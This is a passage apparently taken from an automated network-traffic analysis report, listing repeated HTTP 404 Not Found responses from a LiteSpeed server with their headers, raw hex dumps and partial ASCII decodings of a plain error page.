31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 20 Nov 2024 07:33:04 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 20 Nov 2024 07:33:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 20 Nov 2024 07:33:26 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5a 7a ff ef 53 10 a7 92 cc 94 da ad 15 10 1e bb 67 b4 21 09 90 90 04 02 44 2a 75 4b bb 84 56 b4 c3 54 1e 28 af 91 27 cb 11 b6 db 98 b6 6f f7 a4 f2 23 a7 7f 18 9d e5 db 97 d3 df 77 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f ff 0c c0 78 0c 5c d3 f9 f6 db e5 67 e2 56 26 d8 51 e5 f7 ee b1 0e 9b a7 3b 26 4b 2b 37 ad ee ab 53 ee de 0d ec e7 af a7 bb ca ed 2a b8 07 f1 97 81 1d 98 45 e9 56 4f 75 e5 dd 93 77 9f c2 31 ed c0 bd ef cf 17 59 7c 05 28 cd ee ed 7e e9 d3 83 4a 61 fa 89 f9 8f 9c e0 ba 3c 2c dc f2 ea 08 f2 0e 7a 6a 26 ee d3 5d 13 ba 6d 9e 15 d5 d5 b6 36 74 aa e0 c9 71 9b d0 76 ef 2f 1f 5f 06 61 1a 56 a1 19 df 97 b6 19 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c e4 ac 1a 4c b3 3a 75 1e e1 e7 c9 67 51 96 d5 29 76 07 bd dc 5e c4 65 97 e5 0b 1d bd a8 ad cc 39 0d fe 7e d9 da 7f f6 c3 03 d2 b9 f7 cc 24 8c 4f 0f 03 aa 00 68 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 1e 2b c3 b3 fb 30 40 89 bc 7b bf 18 87 a9 7b 1f b8 a1 1f 54 60 f9 2b 81 91 c3 31 4a 60 93 f7 bb 2c d3 8e fc a2 e7 01 a8 28 ce 8a 87 c1 3f 7b 97 f1 7e db eb 1a 36 c5 31 1c 79 bf 96 9b 8e 13 a6 fe c3 e0 66 3e 31 0b 3f 4c df 4d ff e7 77 f2 4b d7 ae c2 2c fd 02 58 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 e8 be f6 f6 67 02 89 dc 62 7a 26 f2 3e 76 3d 20 25 b3 ae b2 f7 c8 5e 96 8b 67 29 fe b8 fe c6 fb 00 45 ae 35 f0 c6 e9 57 60 91 79 96 96 ee 7d 98 7a d9 0d a3 af 72 65 2e e3 0d f7 d5 f1 b2 32 ab ba 04 da 71 dc 9b c3 17 ab 79 56 ff 10 41 fe e5 8f 4e 17 ae 59 66 e9 e7 e7 b1 e1 f5 f9 de 24 3f 53 c1 15 65 17 99 da d5 85 af 2f df 35 0b f8 ed 71 dd f7 81 e2 06 e1 2b b7 c8 65 7c 48 6f 6f 4b bd 61 00 c7 fb 40 5c 57 d6 5a b8 b9 6b 02 9d 81 30 f2 fc f3 0d 5c 4f fe d5 ce 57 ac d8 04 a7 08 ea fd b6 d7 b5 e9 65 bc ad 5d 71 79 4b 91 f9 09 53 bf 0e e2 3e ac dc a4 bc 01 f3 dd 92 30 60 47 3f b8 52 98 be b9 f2 04 ff c4 d0 ae f5 71 03 fd c5 8e ad ac aa b2 e4 61 d0 e3 78 63 b6 97 d7 95 2d a1 a3 eb c5 2b 49 bc 83 7f 2b 86 5e dd f7 8e 6b 67 85 d9 eb ef 61 00 42 8a 5b f4 41 e8 3d a2 57 89 83 78 44 33 57 da f8 14 cf 43 90 35 6e 71 65 5f ef c9 78 f0 32 bb 2e 3f 5f 36 41 9c 69 6e 3d e7 95 08 8c 1a 11 93 d1 1b 81 57 44 7c 6e c5 af 71 ed 23 45 fd 82 18 eb f8 46 37 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b bd c1 a7 ee 20 ab ab 32 04 01 a1 ff 78 23 bf 57 e4 2b 75 37 c1 f8 bb 79 5d cd bf 71 0b 68 8a c3 1b b2 bc 38 eb fd ab 8f 8c ef 31 5c 34 6d c6 a1 0f 94 6c 83 1b 82 5b bc ad bf 81 fc 7a e3 37 2f 46 ff 11 a6 4b c2 05 39 ea b3 18 d6 07 82 fb 30 31 fd 5b 35 7e 67 ea d3 d8 7b 39 da df 72 40 82 ba e5 af cf b9 ed 4b 7e b4 b2 d8 79 e3 a2 97 e3 35 97 3f ca a0 cd 0a e7 de 02 36 12 81 1c d5 ff b9 37 e3 f8 3d 80 5f e2 0a 24 75 60 dc 03 20 2b 90 25 6e 43 c2 e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 20 Nov 2024 07:33:29 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5a 7a ff ef 53 10 a7 92 cc 94 da ad 15 90 3c 76 cf 68 43 12 20 21 09 04 88 54 ea 96 d0 8e 56 b4 c3 54 1e 28 af 91 27 cb 11 b6 db 98 b6 6f f7 a4 f2 23 a7 7f 18 9d e5 db 97 d3 df 77 7e fb ed b7 c7 7f e2 16 ec ca 54 f9 41 50 25 f1 b7 df 1e 9f ff 0c c0 78 0c 5c cb f9 f6 db e5 67 e2 56 16 d8 51 e5 f7 ee b1 0e 9b a7 3b 36 4b 2b 37 ad ee ab 53 ee de 0d ec e7 af a7 bb ca ed 2a b8 07 f1 97 81 1d 58 45 e9 56 4f 75 e5 dd 93 77 9f c2 b1 ec c0 bd ef cf 17 59 7c 05 28 cd ee ed 7e e9 d3 83 6a 61 f9 89 f5 8f 9c e0 bb 3c 2c dc f2 ea 08 f2 0e 7a 6a 25 ee d3 5d 13 ba 6d 9e 15 d5 d5 b6 36 74 aa e0 c9 71 9b d0 76 ef 2f 1f 5f 06 61 1a 56 a1 15 df 97 b6 15 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c 94 ac 1a 4c b2 3a 75 1e e1 e7 c9 67 51 96 d5 29 76 07 bd dc 5e c4 65 97 e5 0b 1d bd a8 f7 99 73 1a fc fd b2 b5 ff ec 87 07 a4 73 ef 59 49 18 9f 1e 06 74 01 d0 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 3c 56 86 67 f7 61 80 12 79 f7 7e 31 0e 53 f7 3e 70 43 3f a8 c0 f2 57 02 23 87 63 94 c0 a8 f7 bb f6 96 1d f9 45 cf 03 50 51 9c 15 0f 83 7f f6 2e e3 fd b6 d7 35 6c 82 63 38 f2 7e 2d b7 1c 27 4c fd 87 c1 cd 7c 62 15 7e 98 be 9b fe cf ef e4 97 ae 5d 85 59 fa 05 b0 9e 55 6e 71 23 0f 27 2c f3 d8 02 b2 d8 c7 99 1d fd 1f a0 fb da db 9f 05 24 72 8b e9 99 c8 fb d8 f5 80 94 ac ba ca de 23 7b 59 2e 9e a5 f8 e3 fa 1b ef 03 14 b9 d6 c0 1b a7 5f 81 45 e6 59 5a ba f7 61 ea 65 37 8c be ca 95 bd 8c 37 dc 57 c7 cb ca aa ea 12 68 c7 71 6f 0e 5f ac e6 59 fd 43 04 f9 97 3f 3a 5d b8 56 99 a5 9f 9f c7 86 d7 e7 7b 93 fc 4c 05 57 94 5d 64 6a 57 17 be be 7c d7 2c e0 b7 c7 75 df 07 8a 1b 84 af dc 22 97 f1 21 bd bd 2d f5 86 01 1c ef 03 71 5d 59 6b e1 e6 ae 05 74 06 c2 c8 f3 cf 37 70 3d f9 57 3b 5f b1 62 14 4e 13 f4 fb 6d af 6b 93 cb 78 5b bb e2 f2 96 22 eb 13 a6 7e 1d c4 7d 58 b9 49 79 03 e6 bb 25 61 c0 8e 7e 70 a5 30 7d 73 65 0a ff c4 d0 ae f5 71 03 fd c5 8e f7 59 55 65 c9 c3 a0 c7 f1 c6 6c 2f af 2b 5b 42 47 d7 8b 57 92 78 07 ff 56 0c bd ba ef 1d d7 ce 0a ab d7 df c3 00 84 14 b7 e8 83 d0 7b 44 af 12 07 f1 88 61 af b4 f1 29 9e 87 20 6b dc e2 ca be de 93 f1 e0 65 76 5d 7e be 6c 81 38 d3 dc 7a ce 2b 11 18 3d 22 a8 d1 1b 81 57 44 7c 6e c5 af 71 ed 23 45 fd 82 18 eb f8 46 37 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b bd c1 a7 ee 20 ab ab 32 04 01 a1 ff 78 23 bf 57 e4 2b 75 37 c1 f8 bb 79 5d cd bf 71 0b 68 8a c3 1b b2 bc 38 eb fd ab 8f 8c ef 31 5c 34 6d c5 a1 0f 94 6c 83 1b 82 5b bc ad bf 81 fc 7a e3 37 2f 46 ff 11 a6 4b c2 05 39 ea b3 18 d6 07 82 fb 30 b1 fc 5b 35 7e 67 ea d3 d8 7b 39 da df 72 40 82 ba e5 af cf b9 ed 4b 7e dc 67 b1 f3 c6 45 2f c7 6b 2e 7f 94 41 9b 15 ce fd 1e d8 48 04 72 54 ff e7 de 8a e3 f7 00 7e 89 2b 90 d4 81 71 0f 80 ac 40 96 b8 0d 09 9
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 20 Nov 2024 07:33:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5a 7a ff ef 53 10 a7 92 cc 94 da ad 15 10 1e bb 67 b4 21 09 90 90 04 02 44 2a 75 4b bb 84 56 b4 c3 54 1e 28 af 91 27 cb 11 b6 db 98 b6 6f f7 a4 f2 23 a7 7f 18 9d e5 db 97 d3 df 77 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f ff 0c c0 78 0c 5c d3 f9 f6 db e5 67 e2 56 26 d8 51 e5 f7 ee b1 0e 9b a7 3b 26 4b 2b 37 ad ee ab 53 ee de 0d ec e7 af a7 bb ca ed 2a b8 07 f1 97 81 1d 98 45 e9 56 4f 75 e5 dd 93 77 9f c2 31 ed c0 bd ef cf 17 59 7c 05 28 cd ee ed 7e e9 d3 83 4a 61 fa 89 f9 8f 9c e0 ba 3c 2c dc f2 ea 08 f2 0e 7a 6a 26 ee d3 5d 13 ba 6d 9e 15 d5 d5 b6 36 74 aa e0 c9 71 9b d0 76 ef 2f 1f 5f 06 61 1a 56 a1 19 df 97 b6 19 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c e4 ac 1a 4c b3 3a 75 1e e1 e7 c9 67 51 96 d5 29 76 07 bd dc 5e c4 65 97 e5 0b 1d bd a8 ad cc 39 0d fe 7e d9 da 7f f6 c3 03 d2 b9 f7 cc 24 8c 4f 0f 03 aa 00 68 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 1e 2b c3 b3 fb 30 40 89 bc 7b bf 18 87 a9 7b 1f b8 a1 1f 54 60 f9 2b 81 91 c3 31 4a 60 93 f7 bb 2c d3 8e fc a2 e7 01 a8 28 ce 8a 87 c1 3f 7b 97 f1 7e db eb 1a 36 c5 31 1c 79 bf 96 9b 8e 13 a6 fe c3 e0 66 3e 31 0b 3f 4c df 4d ff e7 77 f2 4b d7 ae c2 2c fd 02 58 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 e8 be f6 f6 67 02 89 dc 62 7a 26 f2 3e 76 3d 20 25 b3 ae b2 f7 c8 5e 96 8b 67 29 fe b8 fe c6 fb 00 45 ae 35 f0 c6 e9 57 60 91 79 96 96 ee 7d 98 7a d9 0d a3 af 72 65 2e e3 0d f7 d5 f1 b2 32 ab ba 04 da 71 dc 9b c3 17 ab 79 56 ff 10 41 fe e5 8f 4e 17 ae 59 66 e9 e7 e7 b1 e1 f5 f9 de 24 3f 53 c1 15 65 17 99 da d5 85 af 2f df 35 0b f8 ed 71 dd f7 81 e2 06 e1 2b b7 c8 65 7c 48 6f 6f 4b bd 61 00 c7 fb 40 5c 57 d6 5a b8 b9 6b 02 9d 81 30 f2 fc f3 0d 5c 4f fe d5 ce 57 ac d8 04 a7 08 ea fd b6 d7 b5 e9 65 bc ad 5d 71 79 4b 91 f9 09 53 bf 0e e2 3e ac dc a4 bc 01 f3 dd 92 30 60 47 3f b8 52 98 be b9 f2 04 ff c4 d0 ae f5 71 03 fd c5 8e ad ac aa b2 e4 61 d0 e3 78 63 b6 97 d7 95 2d a1 a3 eb c5 2b 49 bc 83 7f 2b 86 5e dd f7 8e 6b 67 85 d9 eb ef 61 00 42 8a 5b f4 41 e8 3d a2 57 89 83 78 44 33 57 da f8 14 cf 43 90 35 6e 71 65 5f ef c9 78 f0 32 bb 2e 3f 5f 36 41 9c 69 6e 3d e7 95 08 8c 1a 11 93 d1 1b 81 57 44 7c 6e c5 af 71 ed 23 45 fd 82 18 eb f8 46 37 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b bd c1 a7 ee 20 ab ab 32 04 01 a1 ff 78 23 bf 57 e4 2b 75 37 c1 f8 bb 79 5d cd bf 71 0b 68 8a c3 1b b2 bc 38 eb fd ab 8f 8c ef 31 5c 34 6d c6 a1 0f 94 6c 83 1b 82 5b bc ad bf 81 fc 7a e3 37 2f 46 ff 11 a6 4b c2 05 39 ea b3 18 d6 07 82 fb 30 31 fd 5b 35 7e 67 ea d3 d8 7b 39 da df 72 40 82 ba e5 af cf b9 ed 4b 7e b4 b2 d8 79 e3 a2 97 e3 35 97 3f ca a0 cd 0a e7 de 02 36 12 81 1c d5 ff b9 37 e3 f8 3d 80 5f e2 0a 24 75 60 dc 03 20 2b 90 25 6e 43 c2 e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Wed, 20 Nov 2024 07:33:34 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 37 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
